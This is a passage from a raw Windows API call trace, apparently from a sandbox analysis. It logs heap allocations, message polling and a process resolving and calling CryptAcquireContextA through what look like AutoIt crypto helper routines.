lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0165.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0165.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0165.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0165.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0165.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0165.300] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0165.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0165.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0165.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0165.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0165.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0165.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0165.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0165.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0165.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0165.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0165.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0165.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0165.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0165.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0165.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0165.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0165.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0165.301] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0165.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0165.301] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0165.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd50 [0165.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0165.301] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0165.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0165.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c18 [0165.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0165.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0165.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0165.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50608 [0165.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0165.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0165.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0165.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0165.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0165.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0165.302] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0165.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0165.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0165.302] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0165.302] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0165.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0165.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0165.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0165.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0165.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0165.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0165.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0165.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0165.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0165.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0165.303] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0165.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0165.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0165.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0165.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0165.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0165.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0165.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0165.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0165.303] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0165.303] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0165.303] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0165.303] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0165.303] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0165.303] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0165.303] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0165.303] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69a68, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0165.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0165.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0165.304] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0165.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0165.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0165.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0165.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdc0 [0165.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0165.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0165.304] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0165.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15) returned 0x2e69928 [0165.304] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69928, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0165.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0165.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0165.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0165.304] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0165.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0165.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0165.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fdc0 | out: hHeap=0x970000) returned 1 [0165.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0165.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c28 [0165.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0165.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0165.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0165.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0165.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0165.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0165.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0165.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0165.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0165.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0165.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0165.305] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0165.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0165.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0165.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0165.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0165.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0165.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0165.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0165.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0165.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0165.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0165.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0165.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0165.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0165.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0165.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0165.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0165.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0165.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0165.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0165.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0165.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0165.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0165.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0165.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0165.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0165.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0165.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0165.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0165.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0165.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0165.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0165.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0165.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0165.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0165.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0165.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0165.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0165.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0165.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0165.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0165.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0165.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0165.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0165.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0165.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0165.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0165.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0165.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0165.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0165.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0165.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0165.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0165.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0165.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0165.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0165.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0165.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0165.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0165.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0165.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0165.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0165.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0165.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0165.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0165.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0165.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0165.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0165.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0165.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0165.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0165.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0165.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0165.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0165.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0165.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0165.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0165.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0165.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0165.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0165.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0165.311] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0165.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0165.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0165.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0165.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0165.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0165.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0165.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0165.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0165.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0165.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0165.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0165.312] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0165.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0165.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0165.312] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0165.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0165.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0165.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0165.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c68 [0165.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0165.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0165.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0165.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0165.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0165.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0165.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50878 [0165.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0165.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0165.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0165.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0165.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0165.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0165.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0165.313] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0165.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0165.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0165.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0165.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0165.313] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0165.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0165.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0165.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0165.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0165.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0165.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0165.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0165.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 